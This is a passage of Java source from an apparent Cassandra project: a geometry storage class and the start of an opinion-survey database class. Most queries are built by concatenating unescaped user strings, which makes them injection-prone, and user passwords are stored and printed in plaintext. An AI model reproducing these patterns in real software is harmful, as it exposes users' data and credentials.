* Linha: [[(x1,y1),(x2,y2),(x3,y3)]]
* Poligono: [[(x1,y1),(x2,y2),(x3,y3),(x4,y4),(x5,y5),(x6,y6)]] 4º ponto implicito
*
* multiponto: [[(x1,y1)],[(x2,y2)],[(x3,y3)]]
* multiLinha: [[(x1,y1),(x2,y2),(x3,y3)],[(x4,y4),(x5,y5),(x6,y6)]]
* multiPoligono: [[(x1,y1),(x2,y2),(x3,y3)],[(x4,y4),(x5,y5),(x6,y6)]] 4º ponto implicito
*
*/
public class BDgeo {
private Cluster cluster;
private Session session;
@SuppressWarnings("unused")
private String url="127.0.0.1";
private String keyspace="geometry";
private String ks= "CREATE KEYSPACE if not exists "+ keyspace +" WITH REPLICATION = "
+ "{ 'class' : 'SimpleStrategy', 'replication_factor' : 1 };";
private String point="CREATE TYPE IF NOT EXISTS "+keyspace+".POINT(x DOUBLE, y DOUBLE);";
//Q1:(LAT-LONG-ID-GEOM-TIPO-PROPRIEDADES)
private String table1 ="CREATE TABLE IF NOT EXISTS "+keyspace+".geom_latlng"
+"(latitude DOUBLE,"
+ "longitude DOUBLE,"
+ "nome text,"
+ "geometria_tipo text,"
+ "propriedades map<text,text>,"
+ "geometria list< frozen< list< frozen<POINT> >>>,"//"geometria list< frozen< list< frozen<POINT> >>>,"
+ "PRIMARY KEY((longitude,latitude),nome)) with "
+ "CLUSTERING ORDER BY ( nome ASC); ";
//Q2:(ID-LAT-LONG-GEOM-TIPO-PROPRIEDADES)
private String table2 ="CREATE TABLE IF NOT EXISTS "+keyspace+".geom_label"
+"(latitude DOUBLE,"
+ "longitude DOUBLE,"
+ "nome text,"
+ "geometria_tipo text,"
+ "propriedades map<text,text>,"
+ "geometria list< frozen< list< frozen<POINT> >>>,"
+ "PRIMARY KEY(nome, latitude,longitude)) with "
+ "CLUSTERING ORDER BY (latitude ASC, longitude ASC);";
private String idx1="CREATE INDEX if not exists prop_value_1 ON geom_label (propriedades)";
private String idx2="CREATE INDEX if not exists porp_key_1 ON geom_label (KEYS(propriedades))";
private String idx3="CREATE INDEX if not exists prop_value_2 ON geom_latlng (propriedades)";
private String idx4="CREATE INDEX if not exists porp_key_2 ON geom_latlng (KEYS(propriedades))";
public BDgeo(String url, String keyspace) {
this.url=url;
this.keyspace=keyspace;
cluster = Cluster.builder().addContactPoint(url).build();
session=cluster.newSession();
session.execute(ks);
session = cluster.connect(keyspace);
session.execute(point);
session.execute(table1);
session.execute(table2);
session.execute(idx1);
session.execute(idx2);
session.execute(idx3);
session.execute(idx4);
}
public BDgeo(String[] url, String keyspace) {
this.url=url[0];
this.keyspace=keyspace;
for(int i=0;i<url.length;i++)
cluster = Cluster.builder().addContactPoint(url[i]).build();
session=cluster.newSession();
session.execute(ks);
session = cluster.connect(keyspace);
session.execute(point);
//session.execute(table1);
session.execute(table2);
}
//insere todas as geometrias(mesmo tipo) da lista no banco com as mesma chave (nome,lat,long)
//public void InserirGeo(Geometry geom,String nome,Propriedade<String> propriedades) {
public void InserirGeo(List<Geo> lista_geo) {
if (lista_geo==null)
return;
Geo geo;
while(!lista_geo.isEmpty()){
geo=lista_geo.get(0);
if (geo==null){
System.out.println("não é possível adicionar geometrias ao banco: "
+ "geometria nula");
return;
}
if(geo.getGeometria().isEmpty()){
System.out.println("não é possível adicionar geometrias ao banco: "
+ "geometria vazia");
return;
}
//cria string
String table1= "INSERT INTO geom_latlng";
String table2= "INSERT INTO geom_label";
String query="(latitude, longitude, nome, geometria_tipo, propriedades, geometria) VALUES ";
String _tipo="";
String _geom = "";
String __=",";
double lat = 0,lon=0;
Point p = null;
Line l= null;
Polyline pl = null;
Polygon pg=null;
Point2D[] pp2d;
List<Geometry> aux,aux2;
/*------------------------------------------------------
* geometria list< frozen< list< frozen<POINT> >>>
*------------------------------------------------------
* POINT(x FLOAT, y FLOAT) : tipo definido pelo usuario
* frozen<> : utilizado para tipos definidos pelo usuario
* frozen<POINT> : tipo básico geométrico: ponto
* frozen< list< frozen<POINT>>> : listas de pontos define uma geometria (1 ou + pontos): linha,LineString(polyline(1)), poligono
* list< frozen< list< frozen<POINT>>>> : lista de geometrias(estritamente do mesmo tipo):multiponto, multilinha(polyline(n)), multipoligono
*
* === exemplo ===
* ponto: [[(x1,y1)],[(x2,y2)],[(x3,y3)]] 3 pontos
* LinhaString: [[(x1,y1),(x2,y2)],(x3,y3)],[(x4,y4),(x5,y5)],(x6,y6)]] 2 curvas
* Poligono: [[(x1,y1),(x2,y2)],(x3,y3)],[(x4,y4),(x5,y5)],(x6,y6)]] 2 poligonos 4º ponto implicito
* ===============
*/
//while(!geo.getGeometria().isEmpty())
//valores(lat, lon,tipo, geometria)//multiponto lat long é do primeiro ponto
switch(geo.getGeometria().getType()){
case MultiPoint:_tipo="'MultiPoint'";
//criar lista<geometry> com cada ponto
aux2 = new ArrayList<Geometry>();
aux=pontos((MultiPoint)geo.getGeometria());
while(!aux.isEmpty()){
aux2.add(aux.get(0));
aux.remove(0);
}
_geom+="[";
while(!aux2.isEmpty()){
p=(Point)aux2.get(0);
_geom+="[("+String.valueOf(p.getX())+__+String.valueOf(p.getY())+")]";
aux2.remove(0);
if(!aux2.isEmpty())
_geom+=__;
}
_geom+="]";
break;
case Point:_tipo="'Point'";
p=(Point)geo.getGeometria();
lon=p.getX();
lat=p.getY();
_geom+="[[("+String.valueOf(p.getX())+__+String.valueOf(p.getY())+")]]";
break;
case Line: _tipo="'Line'";/*** acho que para geojson esse tipo eh obsoleto por causa da polilinha */
l=(Line)geo.getGeometria();
lon=l.getStartX();
lat=l.getStartY();
_geom+="[[("+String.valueOf(lat)+__+String.valueOf(lon)+"),("+l.getEndX()+__+l.getStartY()+")]]";
break;
case Polyline:_tipo="'Polyline'";
//cada polyline pode ter mais de um caminho
//todos os caminhos de cada polyline é destrinchado e adicionado à lista
//criar lista<geometry> com cada caminho de linha
aux2 = new ArrayList<Geometry>();
int i;
aux=polilinhas((Polyline)geo.getGeometria());
while(!aux.isEmpty()){
aux2.add(aux.get(0));
aux.remove(0);
}
pl = (Polyline)aux2.get(0);
pp2d=pl.getCoordinates2D();
//latitude e longitude
lon=pp2d[0].x;
lat=pp2d[0].y;
//para cada, caminho adiciona as linhas correspondentes
_geom+="[";
while(!aux2.isEmpty()){
pl = (Polyline)aux2.get(0);
pp2d=pl.getCoordinates2D();
if(pp2d.length<2){
System.out.println("não é possível adicionar geometria ao banco: "
+ "geometria POLYLINE corrompida");
//return;
continue;
}
_geom+="[";
for(i=0;i<pp2d.length;i++){
_geom+="("+String.valueOf(pp2d[i].x)+__+String.valueOf(pp2d[i].y)+")";
if(i!=pp2d.length-1) _geom+=__;
else _geom+="]";
}
if(pp2d[i-1].x==pp2d[0].x && pp2d[i-1].y==pp2d[0].y){
System.err.println("não é possível adicionar geometria ao banco: "
+ "Polilinha é um poligono");
//return;
continue;
}
aux2.remove(0);
if(!aux2.isEmpty())
_geom+=__;
}
_geom+="]";
break;
case Polygon: _tipo="'Polygon'";
aux2 = new ArrayList<Geometry>();
aux=poligonos((Polygon)geo.getGeometria());
while(!aux.isEmpty()){
aux2.add(aux.get(0));
aux.remove(0);
}
pg = (Polygon)aux2.get(0);
lon=pg.getXY(0).x;
lat=pg.getXY(0).y;
_geom+="[";
while(!aux2.isEmpty()){
pg = (Polygon)aux2.get(0);
if(pg.getPointCount()<2){
System.err.println("não é possível adicionar geometria ao banco: "
+ "geometria POLYGON corrompida");
//return;
continue;
}
_geom+="[";
//nao possui a repetição do primeiro ponto
for(i=0;i<pg.getPointCount();i++){
_geom+="("+String.valueOf(pg.getXY(i).x)+__+String.valueOf(pg.getXY(i).y)+")";
if(i!=pg.getPointCount()-1) _geom+=__;
else _geom+="]";
}
aux2.remove(0);
if(!aux2.isEmpty())
_geom+=__;
}
_geom+="]";
//nao possui a repetição do primeiro ponto
//assumido que há uma linha entre o ultimo e o primeiro ponto
break;
default:
System.err.println("não é possível adicionar geometria ao banco: "
+ "geometria com tipo indefinido");
//return;
continue;
}
//-----------------------------------------------------------
//completa string
if(geo.getId().contains("'")){
geo.setId(geo.getId().replaceAll("'", "''"));
}
query+="("+String.valueOf(lat)+__+String.valueOf(lon)+__+"'"+geo.getId()+"'"+__+_tipo+__+"{";
//propriedades e outros
while(!geo.getPropriedades().vazio()){
String propp=geo.getPropriedades().getP();
String propv=geo.getPropriedades().getV();
if(propp.contains("'")||propv.contains("'")){
propp=propp.replaceAll("'", "''");
propv=propv.replaceAll("'", "''");
}
query+="'"+propp+"':'"+propv+"'";
geo.getPropriedades().remove();
if(!geo.getPropriedades().vazio()) query+=__;
}
//fim
query+="}"+__+_geom+");";
//execute
//try{
//System.out.println("insert into tables ->"+query);
session.execute(table1+query);
session.execute(table2+query);
//Thread.sleep(500);
//}catch(Exception e){ System.err.println(e.getMessage());}
//geo.setLatitude(lat);
//geo.setLongitude(lon);
lista_geo.remove(0);
}
}
//busca a geometria com chave primaria 'nome'
/*public Geo BuscarGeo(String nome) throws ClassNotFoundException{
// for (Row row : session.execute("SELECT * FROM table1"))
//nome="minha quadra";
List<Row> linha = session.execute("SELECT* from geom_label WHERE id='"+nome+"';").all();//latitude, longitude, nome, geometria, geometria_tipo, propriedades FROM geom_label "
if(linha.size()!=1){
System.out.println("nenhuma ou mais de uma geometria no banco para essa consulta");
return null;
}
//-----------------------------------------------
Geo geo= new Geo();
geo.setLatitude(linha.get(0).getDouble(1));
geo.setLongitude(linha.get(0).getDouble(2));
geo.setId(linha.get(0).getString(0));
geo.setTipo(linha.get(0).getString(4));
//---
Propriedade<String> propriedades =new Propriedade<String> ();
Map<?, ?> map = linha.get(0).getMap(5,Class.forName("java.lang.String"),Class.forName("java.lang.String"));
Set<?> set = map.keySet();
Iterator<?> setIterator = set.iterator();
while(setIterator.hasNext()){
Object key = setIterator.next();
propriedades.put(key.toString(), map.get(key).toString());
}
//---
int cont;
List<UDTValue> registro_primario=null;
List<List<UDTValue>> registro=linha.get(0).getList(3, new TypeToken<List<UDTValue>>(){
private static final long serialVersionUID = 1L;});
switch(geo.getTipo()){
case "Point":
for(int x=0;x< registro.size();x++){
registro_primario=registro.get(x);
if(registro_primario.size()!=1){
System.err.println("diferente de um ponto para a geometria 'Ponto'");
linha.remove(0);
continue;
}
//
geo.setGeometria(new Point(registro_primario.get(0).getDouble(0),registro_primario.get(0).getDouble(1)));
//
registro_primario.remove(0);
}
//acredito que todos os objetos foram removidos dentro do for(){while(){}}
registro.clear();*
break;
case "MultiPoint":
MultiPoint mp= new MultiPoint();
for(int x=0;x< registro.size();x++){
registro_primario=registro.get(x);
if(registro_primario.size()!=1){
System.err.println("diferente de um ponto para a geometria 'Ponto'");
linha.remove(0);
continue;
}
//
while(!registro_primario.isEmpty()){
mp.add(new Point(registro_primario.get(0).getDouble(0),registro_primario.get(0).getDouble(1)));
registro_primario.remove(0);
}
geo.setGeometria(mp);
//
}
break;
case "Line":// acho que para geojson esse tipo eh obsoleto por causa da polilinha
Line l= new Line();
registro_primario=registro.get(0);
if(registro_primario.size()!=2){
System.err.println("diferente de dois ponto para a geometria 'Linha'");
linha.remove(0);
return null;
}
for(cont=0;cont<registro_primario.size();cont++){
//
if(cont==0)
l.setStart(new Point(registro_primario.get(0).getDouble(0),registro_primario.get(0).getDouble(1)));
else
l.setEnd(new Point(registro_primario.get(0).getDouble(0),registro_primario.get(0).getDouble(1)));
registro_primario.remove(cont);
}
geo.setGeometria(l);
break;
case "Polyline":
Polyline pl= new Polyline();
for(int geometrias=0;geometrias< registro.size();geometrias++){
registro_primario=registro.get(geometrias);
if(registro_primario.size()<2){
System.err.println("diferente de dois ponto para a geometria 'Linha'");
linha.remove(0);
continue;
}
//para cada caminho pegar as linhas
for(cont=0;cont<registro_primario.size();cont++){
//
if(cont==0)
pl.startPath(new Point(registro_primario.get(cont).getDouble(0),registro_primario.get(cont).getDouble(1)));
else
pl.lineTo(new Point(registro_primario.get(cont).getDouble(0),registro_primario.get(cont).getDouble(1)));
}
for(cont=0;cont<registro_primario.size();){
registro_primario.remove(0);
}
}
geo.setGeometria(pl);
break;
case "Polygon":
Polygon pg= new Polygon();
for(int geometrias=0;geometrias< registro.size();geometrias++){
registro_primario=registro.get(geometrias);
if(registro_primario.size()<3){
System.err.println("menos de dois ponto para a geometria 'Poligono'");
linha.remove(0);
return null;
}
//para cada caminho pegar as linhas
for(cont=0;cont<registro_primario.size();cont++){
//
if(cont==0)
pg.startPath(new Point(registro_primario.get(cont).getDouble(0),registro_primario.get(cont).getDouble(1)));
else
pg.lineTo(new Point(registro_primario.get(cont).getDouble(0),registro_primario.get(cont).getDouble(1)));
}
for(cont=0;cont<registro_primario.size();){
registro_primario.remove(0);
}
}
geo.setGeometria(pg);
break;
default:
System.err.println("geometria nao definida, será ignorada");
linha.remove(0);
return null;
}
geo.setPropriedades(propriedades);
linha.remove(0);
return geo;
}*/
//busca todas as geometrias no banco
public List<Geo> BuscarGeo(int select,String nome) throws ClassNotFoundException, NullPointerException{
List<Row> linha = null;
switch(select){
case 0: linha= session.execute("SELECT * from geom_label;").all();
break;
case 1: linha = session.execute("SELECT * from geom_label WHERE nome='"+nome+"';").all();
break;
case 2: linha = session.execute("SELECT * from geom_label WHERE propriedades contains key '"+nome+"';").all();
break;
case 3: linha = session.execute("SELECT * from geom_label WHERE propriedades contains '"+nome+"';").all();
break;
case 4: linha= session.execute("SELECT * from geom_latlng;").all();
break;
case 5: linha = session.execute("SELECT * from geom_latlng WHERE latitude=0.0 and longitude=0.0;").all();
break;
case 6: linha = session.execute("SELECT * from geom_latlng WHERE propriedades contains key '"+nome+"';").all();
break;
case 7: linha = session.execute("SELECT * from geom_latlng WHERE propriedades contains '"+nome+"';").all();
break;
default: linha= new ArrayList<Row>();break;
}
List<Geo> lista= new ArrayList<Geo>();
//-----------------------------------------------
while( !linha.isEmpty()){
Geo geo= new Geo();
if(select>3){//tabela geom_latlng
geo.setLatitude(linha.get(0).getDouble(0));
//---
geo.setLongitude(linha.get(0).getDouble(1));
//---
geo.setId(linha.get(0).getString(2));
}
else{///tabela geom_label
geo.setId(linha.get(0).getString(0));
//---
geo.setLatitude(linha.get(0).getDouble(1));
//---
geo.setLongitude(linha.get(0).getDouble(2));
}
//---
geo.setTipo(linha.get(0).getString(4));
//---
Propriedade<String> propriedades =new Propriedade<String> ();
Map<?, ?> map = linha.get(0).getMap(5,Class.forName("java.lang.String"),Class.forName("java.lang.String"));
Set<?> set = map.keySet();
Iterator<?> setIterator = set.iterator();
while(setIterator.hasNext()){
Object key = setIterator.next();
propriedades.put(key.toString(), map.get(key).toString());
}
//---
//transformar em uma unica geometria
int cont;
List<UDTValue> registro_primario=null;
List<List<UDTValue>> registro=linha.get(0).getList(3, new TypeToken<List<UDTValue>>(){
private static final long serialVersionUID = 1L;});
switch(geo.getTipo()){
case "Point":
for(int x=0;x< registro.size();x++){
registro_primario=registro.get(x);
if(registro_primario.size()!=1){
System.err.println("diferente de um ponto para a geometria 'Ponto'");
linha.remove(0);
continue;
}
//
geo.setGeometria(new Point(registro_primario.get(0).getDouble(0),registro_primario.get(0).getDouble(1)));
//
registro_primario.remove(0);
}
/*acredito que todos os objetos foram removidos dentro do for(){while(){}}
registro.clear();*/
break;
case "MultiPoint":
MultiPoint mp= new MultiPoint();
for(int x=0;x< registro.size();x++){
registro_primario=registro.get(x);
if(registro_primario.size()!=1){
System.err.println("diferente de um ponto para a geometria 'Ponto'");
linha.remove(0);
continue;
}
//
while(!registro_primario.isEmpty()){
mp.add(new Point(registro_primario.get(0).getDouble(0),registro_primario.get(0).getDouble(1)));
registro_primario.remove(0);
}
geo.setGeometria(mp);
//
}
break;
case "Line":/*** acho que para geojson esse tipo eh obsoleto por causa da polilinha */
Line l= new Line();
registro_primario=registro.get(0);
if(registro_primario.size()!=2){
System.err.println("diferente de dois ponto para a geometria 'Linha'");
linha.remove(0);
continue;
}
for(cont=0;cont<registro_primario.size();cont++){
//
if(cont==0)
l.setStart(new Point(registro_primario.get(0).getDouble(0),registro_primario.get(0).getDouble(1)));
else
l.setEnd(new Point(registro_primario.get(0).getDouble(0),registro_primario.get(0).getDouble(1)));
registro_primario.remove(cont);
}
geo.setGeometria(l);
break;
case "Polyline":
Polyline pl= new Polyline();
for(int geometrias=0;geometrias< registro.size();geometrias++){
registro_primario=registro.get(geometrias);
if(registro_primario.size()<2){
System.err.println("diferente de dois ponto para a geometria 'Linha'");
linha.remove(0);
continue;
}
//para cada caminho pegar as linhas
for(cont=0;cont<registro_primario.size();cont++){
//
if(cont==0)
pl.startPath(new Point(registro_primario.get(cont).getDouble(0),registro_primario.get(cont).getDouble(1)));
else
pl.lineTo(new Point(registro_primario.get(cont).getDouble(0),registro_primario.get(cont).getDouble(1)));
}
for(cont=0;cont<registro_primario.size();){
registro_primario.remove(0);
}
}
geo.setGeometria(pl);
break;
case "Polygon":
Polygon pg= new Polygon();
for(int geometrias=0;geometrias< registro.size();geometrias++){
registro_primario=registro.get(geometrias);
if(registro_primario.size()<3){
System.err.println("menos de dois ponto para a geometria 'Poligono'");
linha.remove(0);
return null;
}
//para cada caminho pegar as linhas
for(cont=0;cont<registro_primario.size();cont++){
//
if(cont==0)
pg.startPath(new Point(registro_primario.get(cont).getDouble(0),registro_primario.get(cont).getDouble(1)));
else
pg.lineTo(new Point(registro_primario.get(cont).getDouble(0),registro_primario.get(cont).getDouble(1)));
}
for(cont=0;cont<registro_primario.size();){
registro_primario.remove(0);
}
}
geo.setGeometria(pg);
break;
default:
System.err.println("geometria nao definida, será ignorada");
linha.remove(0);
continue;
}
//---
geo.setPropriedades(propriedades);
linha.remove(0);
lista.add(geo);
}
return lista;
}
//Polygon(n)-> list<Polygon(1)>(n)
private List<Geometry> poligonos(Polygon polygon) {
if(polygon==null){
System.err.println("poligono nula...");
return null;
}
List<Geometry> lista= new ArrayList<Geometry>();
int x,y,inicio;
if(polygon.getPathCount()==1){
lista.add(polygon);
return lista;
}
for(x=0;x<polygon.getPathCount();x++){
Polygon pg=new Polygon();
Point ptOut = new Point();
inicio=polygon.getPathStart(x);
for(y=inicio;y<polygon.getPathEnd(x);y++){
polygon.getPoint(y, ptOut);
if(y==inicio)
pg.startPath(ptOut);
else
pg.lineTo(ptOut);
}
lista.add(pg);
}
return lista;
}
//Polyline(n)-> list<Polyline(1)>(n)
private List<Geometry> polilinhas(Polyline polyline) {
if(polyline==null){
System.err.println("polylinha nula...");
return null;
}
List<Geometry> lista= new ArrayList<Geometry>();
int x,y,inicio;
if(polyline.getPathCount()==1){
lista.add(polyline);
return lista;
}
for(x=0;x<polyline.getPathCount();x++){
Polyline pg=new Polyline();
Point ptOut = new Point();
inicio=polyline.getPathStart(x);
for(y=inicio;y<polyline.getPathEnd(x);y++){
polyline.getPoint(y, ptOut);
if(y==inicio)
pg.startPath(ptOut);
else
pg.lineTo(ptOut);
}
lista.add(pg);
}
return lista;
}
//Multipoints(n)-> list<Points>(n)
private List<Geometry> pontos(MultiPoint multipoints) {
List<Geometry> lista= new ArrayList<Geometry>();
for(int x=0;x<multipoints.getPointCount();x++){
Point p=new Point();
p=multipoints.getPoint(x);
lista.add(p);
}
multipoints.setEmpty();
return lista;
}
public void LimparBanco(){
session=cluster.newSession();
session = cluster.connect(keyspace);
session.execute("drop table if exists geom_label;");
session.execute("drop table if exists geom_latlng;");
session.execute(table1);
session.execute(table2);
session.execute(idx1);
session.execute(idx2);
session.execute(idx3);
session.execute(idx4);
}
}
<file_sep>/BDGCassandra/src/Cassandra/servico/consultaopiniao/BD.java
/*
CREATE KEYSPACE ConsultaOpiniao WITH replication = {'class':'SimpleStrategy', 'replication_factor':1};
USE ConsultaOpiniao;
// Q1:
CREATE TABLE estabelecimento (id UUID, estabelecimento_nome TEXT, estabelecimento_descricao TEXT, avaliacao DOUBLE, latitude DOUBLE, longitude DOUBLE, PRIMARY KEY (id));
SELECT estabelecimento_nome, latitude, longitude, tipo_estabelecimento_descricao FROM estabelecimento WHERE id=?;
// Q2:
CREATE TABLE usuario (cpf TEXT, senha TEXT, usuario_nome TEXT, email TEXT, PRIMARY KEY (cpf));
SELECT usuario_nome, senha, email FROM usuario WHERE cpf=?;
// Q3:
CREATE TABLE avaliacao (id UUID, estabelecimento_nome TEXT, estabelecimento_descricao TEXT, avaliacao MAP<TEXT,DOUBLE>, PRIMARY KEY (id,estabelecimento_nome)) WITH CLUSTERING ORDER BY (estabelecimento_nome ASC);
SELECT estabelecimento_nome, tipo_estabelecimento_descricao, usuario_nome FROM avaliacao WHERE id=?;
// Q4:
CREATE TABLE table2 (id UUID, tipo INT, estabelecimento_nome TEXT, avaliacao LIST<TEXT>, PRIMARY KEY (id,tipo)) WITH CLUSTERING ORDER BY (tipo ASC);
SELECT tipo, estabelecimento_nome FROM table2 WHERE id=?;
*/
package Cassandra.servico.consultaopiniao;
import Cassandra.gis.db.Tupla;
import com.datastax.driver.core.Cluster;
import com.datastax.driver.core.ResultSet;
import com.datastax.driver.core.Row;
import com.datastax.driver.core.Session;
import com.datastax.driver.core.TupleValue;
import com.google.common.reflect.TypeToken;
import java.util.ArrayList;
import java.util.List;
import java.util.UUID;
public class BD {
private Cluster cluster;
private Session session;
private String url="127.0.0.1";
private String keyspace="consulta_opiniao";
//private String keyspace="geom";
public BD() {
String ks= "CREATE KEYSPACE if not exists "+ keyspace
+" WITH REPLICATION = "
+ "{ 'class' : 'SimpleStrategy', 'replication_factor' : 1 };";
//Q1: Quais estabelecimentos estão disponíveis para avaliação?onde estão? qual o tipo?
String q1="CREATE TABLE if not exists estabelecimento "
+ "(estabelecimento_id UUID,"
+ "estabelecimento_nome TEXT,"
+ "estabelecimento_descricao TEXT,"
+ "avaliacao DOUBLE,"
+ "latitude DOUBLE,"
+ "longitude DOUBLE, PRIMARY KEY (estabelecimento_id));";
//Q2: Quais dados cadastrais do usuario?
String q2="CREATE TABLE if not exists usuario "
+ "(cpf TEXT,"
+ "usuario_nome TEXT,"
+ "senha TEXT,"
+ "email TEXT,"
+ "PRIMARY KEY (cpf));";
//Q3: Quais são todas as avaliações feitas dado um estabelecimento? Qual a nota de cada avaliação? De quem é cada avaliação?
String q3="CREATE TABLE if not exists avaliacao "
+ "(estabelecimento_id UUID,"// para nao ter q pesquisar todas as avaliacoes para achar a desses estabelecimento
+ "avaliacao_id UUID,"
+ "estabelecimento_nome TEXT,"
+ "estabelecimento_descricao TEXT,"
+ "usuario_nome TEXT,"
+ "avaliacao DOUBLE,"
+ "PRIMARY KEY (estabelecimento_id,avaliacao_id));";
//+ "WITH CLUSTERING ORDER BY (usuario_nome ASC);";
//Q3 v2: Quais são todas as avaliações feitas dado um estabelecimento? Qual a nota de cada avaliação? De quem é cada avaliação?
@SuppressWarnings("unused")
String q3_2="CREATE TABLE if not exists avaliacao "
+ "(estabelecimento_id UUID,"
+ "estabelecimento_nome TEXT,"
+ "estabelecimento_descricao TEXT,"
+ "avaliacao list<frozen<tuple<TEXT,DOUBLE>>>,"
+ "PRIMARY KEY (estabelecimento_id));";
//+ "WITH CLUSTERING ORDER BY (estabelecimento_nome ASC);";
//Q4: Quais perguntas um estabelecimento faz ao usuário?
String q4="CREATE TABLE if not exists tipoAvaliacao"
+ "(estabelecimento_id UUID,"
//+ "tipo INT,"
+ "estabelecimento_descricao TEXT,"
+ "avaliacao_descricao LIST<TEXT>,"
+ "PRIMARY KEY (estabelecimento_id));";
//+ "WITH CLUSTERING ORDER BY (tipo ASC);";
//String idx1="CREATE INDEX if not exists avl_index on avaliacao(avaliacao_id)";
String idx1="CREATE CUSTOM INDEX if not exists avaliacao_index ON avaliacao (avaliacao_id) USING 'org.apache.cassandra.index.sasi.SASIIndex'";
@SuppressWarnings("unused")
String idx1_2="CREATE CUSTOM INDEX if not exists avaliacao_index ON avaliacao (avaliacao) USING 'org.apache.cassandra.index.sasi.SASIIndex'";
String idx2="CREATE CUSTOM INDEX if not exists usuario_index on usuario(usuario_nome) USING 'org.apache.cassandra.index.sasi.SASIIndex'";
//String idx3="CREATE CUSTOM INDEX if not exists estabelecimento_index on estabelecimento(estabelecimento_id) USING 'org.apache.cassandra.index.sasi.SASIIndex'";
//String idx3="";
//String idx4="";
cluster = Cluster.builder().addContactPoint(url).build();
//Cluster.builder().addContactPoint("192.168.0.100");
//Cluster.builder().addContactPoint("192.168.0.102");
//Cluster.builder().addContactPoint("172.16.31.10");
session=cluster.newSession();
session.execute(ks);
session = cluster.connect(keyspace);
//deletar essas 4 linha
/*session.execute("drop table estabelecimento;");
session.execute("drop table usuario;");
session.execute("drop table avaliacao;");
session.execute("drop table tipoavaliacao;");*/
session.execute(q1);
session.execute(q2);
session.execute(q3);
session.execute(q4);
session.execute(idx1);
session.execute(idx2);
//session.execute(idx3);
}
///INSERT
public void inserirEstabelecimento(UUID estabelecimento_id, double latitude, double longitude, String estabelecimento_descricao, String estabelecimento_nome){
//try{
session.execute("INSERT INTO estabelecimento ( estabelecimento_id,estabelecimento_descricao, estabelecimento_nome, avaliacao, latitude, longitude) VALUES ("
+String.valueOf(estabelecimento_id)
+", '"+estabelecimento_descricao
+"', '"+estabelecimento_nome
+"', 0.0"
+", "+String.valueOf(latitude)
+", "+String.valueOf(longitude)+")");
}
public void inserirEstabelecimento_2(UUID estabelecimento_id, double latitude, double longitude, String estabelecimento_descricao, String estabelecimento_nome){
//try{
session.execute("INSERT INTO estabelecimento ( estabelecimento_id,estabelecimento_descricao, estabelecimento_nome, avaliacao, latitude, longitude) VALUES ("
+String.valueOf(estabelecimento_id)
+", '"+estabelecimento_descricao
+"', '"+estabelecimento_nome
+"', 0.0"
+", "+String.valueOf(latitude)
+", "+String.valueOf(longitude)+")");
//ja cria um registro de avaliacao vazio
session.execute("INSERT INTO avaliacao( estabelecimento_id, estabelecimento_nome,estabelecimento_descricao,avaliacao) VALUES ("
+String.valueOf(estabelecimento_id)
+", '"+estabelecimento_nome
+"', '"+estabelecimento_descricao
+"', null)");
}
public void inserirUsuario(String cpf, String senha, String nome, String email){
session.execute("INSERT INTO usuario (cpf, senha, usuario_nome, email) VALUES ('"
+cpf
+"', '"+senha
+"', '"+nome
+"', '"+email+"')");
}
public void inserirAvaliacao(UUID estabelecimento_id,UUID avaliacao_id,String estabelecimento_nome, String estabelecimento_descricao,String usuario_nome,double valor){
session.execute("INSERT INTO avaliacao( estabelecimento_id, avaliacao_id,estabelecimento_nome,estabelecimento_descricao, usuario_nome,avaliacao) VALUES ("
+String.valueOf(estabelecimento_id)
+","+String.valueOf(avaliacao_id)
+", '"+estabelecimento_nome
+"', '"+estabelecimento_descricao
+"', '"+usuario_nome
+"', "+String.valueOf(valor)+")");
}
public void inserirAvaliacao(UUID estabelecimento_id,String usuario_nome,double valor){
Estabelecimento e=buscarEstabelecimento(estabelecimento_id);
session.executeAsync("INSERT INTO avaliacao( estabelecimento_id, estabelecimento_nome,estabelecimento_descricao, usuario_nome,avaliacao) VALUES ("
+String.valueOf(estabelecimento_id)
+", '"+e.getNome()
+"', '"+e.getDescricao()
+"', '"+usuario_nome
+"', "+String.valueOf(valor)+")");
}
public void inserirAvaliacao_2(UUID estabelecimento_id,String usuario_nome,double valor){
//talvez criar uma registro para cada avaliacao tenha mais performance
//if(buscarAvaliacao(estabelecimento_id)!=null){
session.execute("UPDATE avaliacao SET avaliacao = avaliacao + [('"+usuario_nome+"',"+String.valueOf(valor)+")] "
+" WHERE estabelecimento_id = "+String.valueOf(estabelecimento_id));
//+" AND estabelecimento_nome = '"+estabelecimento_nome+"'";
//}
}
public void inserirTipoAvaliacao(UUID estabelecimento_id, String estabelecimento_descricao, String avaliacao_descricao){
//try{
if(buscarTipoAvaliacao(estabelecimento_id))
session.execute("UPDATE tipoAvaliacao SET avaliacao_descricao = avaliacao_descricao + ['"+avaliacao_descricao+"'] "
+" WHERE estabelecimento_id = "+String.valueOf(estabelecimento_id));
//+" AND tipo ="+tipo);
else
session.execute("INSERT INTO tipoAvaliacao (estabelecimento_id, estabelecimento_descricao, avaliacao_descricao) VALUES ("
+String.valueOf(estabelecimento_id)
//+", "+String.valueOf(tipo)
+", '"+estabelecimento_descricao
+"', ['"+avaliacao_descricao+"'])");
}
//SELECT
//estabelecimentos
public Estabelecimento buscarEstabelecimento(UUID estabelecimento_id){
ResultSet result= session.execute("SELECT estabelecimento_id, latitude, longitude,estabelecimento_descricao, estabelecimento_nome FROM estabelecimento "
+ "WHERE estabelecimento_id="+String.valueOf(estabelecimento_id)+";");
for (Row row : result) {
System.out.format("%s %e %e %s %s\n", row.getUUID("estabelecimento_id"), row.getDouble("latitude"), row.getDouble("longitude"), row.getString("estabelecimento_descricao"), row.getString("estabelecimento_nome"));
Estabelecimento e= new Estabelecimento();
e.setId(row.getUUID("estabelecimento_id"));
e.setLatitude(row.getDouble("latitude"));
e.setLongitude(row.getDouble("longitude"));
e.setNome(row.getString("estabelecimento_nome"));
e.setDescricao(row.getString("estabelecimento_descricao"));
return e;
}
return null;
}
//usuarios
public void buscarUsuario(String cpf){
ResultSet results = session.execute("SELECT cpf, senha, usuario_nome, email FROM usuario "
+ "WHERE cpf='"+cpf+"';");
for (Row row : results) {
System.out.format("%s %s %s %s\n", row.getString("cpf"), row.getString("senha"), row.getString("nome"), row.getString("email"));
}
}
//retorna todas as avaliacaos
public List<Avaliacao> buscarAvaliacao(UUID estabelecimento_id){
ResultSet results = session.execute("SELECT * FROM avaliacao where estabelecimento_id="+estabelecimento_id+";");
List<Avaliacao> L_av=new ArrayList<Avaliacao>();
Avaliacao av=null;
for (Row row : results) {
/*String estabelecimento_nome;
String estabelecimento_descricao;
String usuario_nome;
double nota;
estabelecimento_nome=row.getString("estabelecimento_nome");
estabelecimento_descricao=row.getString("estabelecimento_descricao");
